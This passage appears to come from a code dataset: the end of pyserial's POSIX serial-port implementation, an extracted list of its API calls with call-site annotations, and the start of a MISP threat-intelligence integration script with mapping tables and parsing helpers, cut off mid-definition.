'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() while len(read) < size: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. raise SerialException('device reports readiness to read but returned no data (device disconnected?)') read.extend(buf) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if self.fd is None: raise portNotOpenError t = len(data) d = data if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while t > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError d = d[n:] t = t - n except OSError as v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if self.fd is None: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def drainOutput(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """For easier use of the serial port instance with select. WARNING: this function is not portable to different platforms!""" if self.fd is None: raise portNotOpenError return self.fd def flowControl(self, enable): """manually control flow - when hardware or software flow control is enabled""" if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
[ "os.open", "fcntl.fcntl", "termios.tcflush", "select.poll", "termios.tcflow", "termios.tcdrain", "termios.tcsetattr", "FCNTL.ioctl", "os.uname", "select.select", "array.array", "os.close", "os.write", "struct.pack", "sys.stderr.write", "struct.unpack", "time.time", "sys.platform.lower", "fcntl.ioctl", "termios.tcgetattr" ]
[((909, 929), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\n', (927, 929), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8255, 8274), 'struct.pack', 'struct.pack', (['"""I"""', '(0)'], {}), "('I', 0)\n", (8266, 8274), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8291, 8318), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_RTS'], {}), "('I', TIOCM_RTS)\n", (8302, 8318), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8335, 8362), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_DTR'], {}), "('I', TIOCM_DTR)\n", (8346, 8362), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1178, 1204), 'array.array', 'array.array', (['"""i"""', '([0] * 32)'], {}), "('i', [0] * 32)\n", (1189, 1204), False, 'import array, fcntl\n'), ((1242, 1288), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCGSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)\n', (1253, 1288), False, 'import FCNTL\n'), ((14576, 14673), 'termios.tcsetattr', 'termios.tcsetattr', (['self.fd', 'TERMIOS.TCSANOW', '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'], {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\n ispeed, ospeed, cc])\n', (14593, 14673), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15335, 15380), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCINQ', 'TIOCM_zero_str'], {}), '(self.fd, TIOCINQ, TIOCM_zero_str)\n', (15346, 15380), False, 'import array, fcntl\n'), ((18213, 18255), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCIFLUSH'], {}), '(self.fd, TERMIOS.TCIFLUSH)\n', (18228, 18255), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18468, 18510), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCOFLUSH'], {}), '(self.fd, TERMIOS.TCOFLUSH)\n', (18483, 18510), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19762, 19808), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (19773, 19808), False, 'import array, fcntl\n'), ((20007, 20053), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20018, 20053), False, 'import array, fcntl\n'), ((20251, 20297), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20262, 20297), False, 'import array, fcntl\n'), ((20494, 20540), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20505, 20540), False, 'import array, fcntl\n'), ((20759, 20783), 'termios.tcdrain', 'termios.tcdrain', (['self.fd'], {}), '(self.fd)\n', (20774, 20783), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20922, 20972), 'fcntl.fcntl', 'fcntl.fcntl', (['self.fd', 'FCNTL.F_SETFL', 'os.O_NONBLOCK'], {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\n', (20933, 20972), False, 'import array, fcntl\n'), ((22494, 22507), 'select.poll', 'select.poll', ([], {}), '()\n', (22505, 22507), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1505, 1551), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCSSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)\n', (1516, 1551), False, 'import FCNTL\n'), ((9036, 9098), 'os.open', 'os.open', (['self.portstr', '(os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)'], {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)\n', (9043, 9098), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((10218, 10244), 'termios.tcgetattr', 'termios.tcgetattr', (['self.fd'], {}), '(self.fd)\n', (10235, 10244), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15396, 15417), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (15409, 15417), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15862, 15909), 'select.select', 'select.select', (['[self.fd]', '[]', '[]', 'self._timeout'], {}), '([self.fd], [], [], self._timeout)\n', (15875, 15909), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18955, 18985), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCSBRK'], {}), '(self.fd, TIOCSBRK)\n', (18966, 18985), False, 'import array, fcntl\n'), ((19012, 19042), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCCBRK'], {}), '(self.fd, TIOCCBRK)\n', (19023, 19042), False, 'import array, fcntl\n'), ((19212, 19257), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)\n', (19223, 19257), False, 'import array, fcntl\n'), ((19284, 19329), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)\n', (19295, 19329), False, 'import array, fcntl\n'), ((19503, 19548), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)\n', (19514, 19548), False, 'import array, fcntl\n'), ((19575, 19620), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)\n', (19586, 19620), False, 'import array, fcntl\n'), ((21377, 21415), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCION'], {}), '(self.fd, TERMIOS.TCION)\n', (21391, 21415), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((21442, 21481), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCIOFF'], {}), '(self.fd, TERMIOS.TCIOFF)\n', (21456, 21481), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((14924, 14941), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (14932, 14941), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17064, 17075), 'time.time', 'time.time', ([], {}), '()\n', (17073, 17075), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17196, 17216), 'os.write', 'os.write', (['self.fd', 'd'], {}), '(self.fd, d)\n', (17204, 17216), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((9404, 9421), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (9412, 9421), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17547, 17589), 'select.select', 'select.select', (['[]', '[self.fd]', '[]', 'timeleft'], {}), '([], [self.fd], [], timeleft)\n', (17560, 17589), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19824, 19845), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (19837, 19845), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20069, 20090), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20082, 20090), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20313, 20334), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20326, 20334), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20556, 20577), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20569, 20577), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17416, 17427), 'time.time', 'time.time', ([], {}), '()\n', (17425, 17427), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((3798, 3826), 'array.array', 'array.array', (['"""i"""', '[baudrate]'], {}), "('i', [baudrate])\n", (3809, 3826), False, 'import array, fcntl\n'), ((3899, 3940), 'fcntl.ioctl', 'fcntl.ioctl', (['port.fd', 'IOSSIOSPEED', 'buf', '(1)'], {}), '(port.fd, IOSSIOSPEED, buf, 1)\n', (3910, 3940), False, 'import array, fcntl\n'), ((3527, 3537), 'os.uname', 'os.uname', ([], {}), '()\n', (3535, 3537), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((5714, 6179), 'sys.stderr.write', 'sys.stderr.write', (['("""don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))'], {}), '(\n """don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))\n', (5730, 6179), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n')]
# type: ignore from typing import Union, List, Dict from urllib.parse import urlparse import urllib3 from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute from pymisp.tools import GenericObjectGenerator import copy from pymisp.tools import FileObject from CommonServerPython import * logging.getLogger("pymisp").setLevel(logging.CRITICAL) def handle_connection_errors(error): if "SSLError" in error: return_error('Unable to connect to MISP because of a SSLCertVerificationError, ' 'Please try to use the Trust any certificate option.') if "NewConnectionError" in error: return_error('Unable to connect to MISP because of a NewConnectionError, ' 'Please make sure your MISP server url is correct.') if "Please make sure the API key and the URL are correct" in error: return_error('Unable to connect to MISP, ' 'Please make sure the API key is correct.') return_error(error) def warn(*args): """ Do nothing with warnings """ pass # Disable requests warnings urllib3.disable_warnings() # Disable python warnings warnings.warn = warn ''' GLOBALS/PARAMS ''' params = demisto.params() if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')): raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.') MISP_URL = params.get('url') VERIFY = not params.get('insecure') PROXIES = handle_proxy() # type: ignore try: PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES) except PyMISPError as e: handle_connection_errors(e.message) PREDEFINED_FEEDS = { 'CIRCL': {'name': 'CIRCL OSINT Feed', 'url': 'https://www.circl.lu/doc/misp/feed-osint', 'format': 'misp', 'input': 'network'}, 'Botvrij.eu': {'name': 'The Botvrij.eu Data', 'url': 'http://www.botvrij.eu/data/feed-osint', 'format': 'misp', 'input': 'network'} } THREAT_LEVELS_TO_ID = { 'High': 1, 'Medium': 2, 'Low': 3, 'Unknown': 4 } MISP_ENTITIES_TO_CONTEXT_DATA = { 'deleted': 'Deleted', 'category': 'Category', 'comment': 'Comment', 'uuid': 'UUID', 'sharing_group_id': 'SharingGroupID', 'timestamp': 'LastChanged', 'to_ids': 'ToIDs', 'value': 'Value', 'event_id': 'EventID', 'ShadowAttribute': 'ShadowAttribute', 'disable_correlation': 'DisableCorrelation', 'distribution': 'Distribution', 'type': 'Type', 'id': 'ID', 'date': 'CreationDate', 'info': 'Info', 'published': 'Published', 'attribute_count': 'AttributeCount', 'proposal_email_lock': 'ProposalEmailLock', 'locked': 'Locked', 'publish_timestamp': 'PublishTimestamp', 'event_creator_email': 'EventCreatorEmail', 'name': 'Name', 'analysis': 'Analysis', 'threat_level_id': 'ThreatLevelID', 'old_id': 'OldID', 'org_id': 'OrganizationID', 'Org': 'Organization', 'Orgc': 'OwnerOrganization', 'orgc_uuid': 'OwnerOrganization.UUID', 'orgc_id': 'OwnerOrganization.ID', 'orgc_name': 'OwnerOrganization.Name', 'event_uuid': 'EventUUID', 'proposal_to_delete': 'ProposalToDelete', 'description': 'Description', 'version': 'Version', 'Object': 'Object', 'object_id': 'ObjectID', 'object_relation': 'ObjectRelation', 'template_version': 'TemplateVersion', 'template_uuid': 'TemplateUUID', 'meta-category': 'MetaCategory', 'decay_score': 'DecayScore', 'first_seen': 'first_seen', 'last_seen': 'last_seen', 'provider': 'Provider', 'source_format': 'SourceFormat', 'url': 'URL', 'event_uuids': 'EventUUIDS', } MISP_ANALYSIS_TO_IDS = { 'initial': 0, 'ongoing': 1, 'completed': 2 } MISP_DISTRIBUTION_TO_IDS = { 'Your_organization_only': 0, 'This_community_only': 1, 'Connected_communities': 2, 'All_communities': 3, 'Inherit_event': 5 } SIGHTING_TYPE_NAME_TO_ID = { 'sighting': 0, 'false_positive': 1, 'expiration': 2 } SIGHTING_TYPE_ID_TO_NAME = { '0': 'sighting', '1': 'false_positive', '2': 'expiration' } INDICATOR_TYPE_TO_DBOT_SCORE = { 'FILE': DBotScoreType.FILE, 'URL': DBotScoreType.URL, 'DOMAIN': DBotScoreType.DOMAIN, 'IP': DBotScoreType.IP, 'EMAIL': DBotScoreType.EMAIL, } DOMAIN_REGEX = ( r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}" "[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*" "\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css" "|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$" "|localhost)" ) MISP_SEARCH_ARGUMENTS = [ 'value', 'type', 'category', 'org', 'tags', 'from', 'to', 'event_id', 'uuid', 'to_ids', 'last', 'include_decay_score', 'include_sightings', 'include_correlations', 'limit', 'page', 'enforceWarninglist', 'include_feed_correlations', ] EVENT_FIELDS = [ 'id', 'orgc_id', 'org_id', 'date', 'threat_level_id', 'info', 'published', 'uuid', 'analysis', 'attribute_count', 'timestamp', 'distribution', 'proposal_email_lock', 'locked', 'publish_timestamp', 'sharing_group_id', 'disable_correlation', 'event_creator_email', 'Org', 'Orgc', 'RelatedEvent', 'Galaxy', 'Tag', 'decay_score', 'Object', 'Feed', ] ATTRIBUTE_FIELDS = [ 'id', 'event_id', 'object_id', 'object_relation', 'category', 'type', 'to_ids', 'uuid', 'timestamp', 'distribution', 'sharing_group_id', 'comment', 'deleted', 'disable_correlation', 'first_seen', 'last_seen', 'value', 'Event', 'Object', 'Galaxy', 'Tag', 'decay_score', 'Sighting', ] def extract_error(error: list) -> List[dict]: """ Extracting errors raised by PYMISP into readable response, for more information and examples please see UT: test_extract_error. Args: error: list of responses from error section Returns: List[Dict[str, any]]: filtered response """ return [{ 'code': err[0], 'message': err[1].get('message'), 'errors': err[1].get('errors') } for err in error] def dict_to_generic_object_format(args: dict) -> List[dict]: """ Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp. Args: args: dictionary describes MISP object Returns: list: list containing dicts that GenericObjectGenerator can take. Examples: >>> {'ip': '8.8.8.8', 'domain': 'google.com'} [{'ip': '8.8.8.8'}, {'domain': 'google.com'}] """ return [{k: v} for k, v in args.items()] def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator: """ Args: template_name: template name as described in https://github.com/MISP/misp-objects args: arguments to create the generic object Returns: GenericObjectGenerator: object created in MISP Example: args should look like: [{'analysis_submitted_at': '2018-06-15T06:40:27'}, {'threat_score': {value=95, to_ids=False}}, {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'}, {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96}, {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line """ misp_object = GenericObjectGenerator(template_name) misp_object.generate_attributes(args) return misp_object def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str: """ Gets a timestamp from MISP response (1546713469) and converts it to human readable format """ return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else "" def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]: """ Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT) Args: obj_to_build (Union[dict, list, str]): object to replace keys in Returns: Union[dict, list, str]: same object type that got in """ if isinstance(obj_to_build, list): return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build] if isinstance(obj_to_build, dict): return { (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key): replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items() } return obj_to_build def reputation_command_to_human_readable(outputs, score, events_to_human_readable): found_tag_id, found_tag_name = "", "" for event in events_to_human_readable: # removing those fields as they are shared by the events found_tag_id = event.pop('Tag_ID') found_tag_name = event.pop('Tag_Name') return { 'Attribute Type': outputs[0].get('Type'), 'Dbot Score': score, 'Attribute Value': outputs[0].get('Value'), 'Attribute Category': outputs[0].get('Category'), 'Timestamp': outputs[0].get('Timestamp'), 'Events with the scored tag': events_to_human_readable, 'Scored Tag ID': found_tag_id, 'Scored Tag Name': found_tag_name, } def limit_tag_output_to_id_and_name(attribute_dict, is_event_level): """ As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields. In addition, returns set of the found tag ids. Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag. Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag. If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags (event ones and the event's attribute tags ones as it is part of the event scope). If the data is attribute's (is_event_level = false), and the tag is only related to an attribute we would like to add it to tag_set_ids. In any other case, we won't add the tag. Args: attribute_dict (dict): The dictionary that includes the tag list. is_event_level (bool): Whether the attribute_dict was received from an event object, meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags). """ output = [] tag_set_ids = set() tags_list = attribute_dict.get('Tag', []) for tag in tags_list: is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0' tag_id = tag.get('id') if is_event_level: tag_set_ids.add(tag_id) else: # attribute level if not is_event_tag: tag_set_ids.add(tag_id) output.append({'ID': tag_id, 'Name': tag.get('name')}) return output, tag_set_ids def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ After getting all the attributes which match the required indicator value, this function parses the response. This function goes over all the attributes that found (after limit the attributes amount to the given limit) and by sub-functions calculated the score of the indicator. For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects. Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are the newer ones. Returns: response (dict): The parsed outputs to context data (array of attributes). score: the indicator score found_tag: the tag (id) which made the indicator to get that score found_related_events (dict): contains info (name, id, threat level id) about all the events that include the indicator Please see an example for a response in test_data/reputation_command_response.json Please see an example for a parsed output in test_data/reputation_command_outputs.json """ response = copy.deepcopy(misp_response) attributes_list = response.get('Attribute') if not attributes_list: return None attributes_list = sorted(attributes_list, key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit] found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list) attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events) score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids, malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level) formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list}) return formatted_response, score, found_tag, found_related_events def 